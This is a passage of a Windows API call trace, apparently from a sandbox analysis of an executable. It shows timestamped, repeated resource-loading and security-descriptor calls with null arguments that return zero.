[0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.847] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.847] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.847] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.847] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.847] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.847] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.848] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.848] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.848] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.848] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.848] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.848] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.848] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.848] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.848] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.848] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.848] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.848] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.848] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.848] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.848] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.848] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.848] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.848] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.848] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.848] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.848] LockResource (hResData=0x0) returned 0x0 [0219.848] FreeResource (hResData=0x0) returned 0 [0219.848] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.848] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.848] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.849] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.849] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.849] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.849] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.849] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.849] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.849] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.849] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.849] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.849] LockResource (hResData=0x0) returned 0x0 [0219.849] FreeResource (hResData=0x0) returned 0 [0219.849] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.850] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.850] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.850] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.850] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.850] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.850] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.850] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.850] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.850] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.850] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.850] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.850] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.850] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.850] LockResource (hResData=0x0) returned 0x0 [0219.850] FreeResource (hResData=0x0) returned 0 [0219.850] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.850] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.851] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.851] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.851] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.851] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.851] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.851] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.851] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.851] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.851] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.851] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.851] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.851] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.851] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.851] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.851] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.851] LockResource (hResData=0x0) returned 0x0 [0219.851] FreeResource (hResData=0x0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.852] FreeResource (hResData=0x0) returned 0 [0219.852] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.852] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.852] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.852] FreeResource (hResData=0x0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.852] FreeResource (hResData=0x0) returned 0 [0219.852] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.852] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.852] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.852] FreeResource (hResData=0x0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.852] FreeResource (hResData=0x0) returned 0 [0219.852] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.852] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.852] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.852] FreeResource (hResData=0x0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.852] FreeResource (hResData=0x0) returned 0 [0219.852] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.852] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.852] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.852] FreeResource (hResData=0x0) returned 0 [0219.852] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.852] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.852] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.853] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.853] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.853] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.853] LockResource (hResData=0x0) returned 0x0 [0219.853] FreeResource (hResData=0x0) returned 0 [0219.853] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.853] LoadResource (hModule=0x400000, hResInfo=0x0) 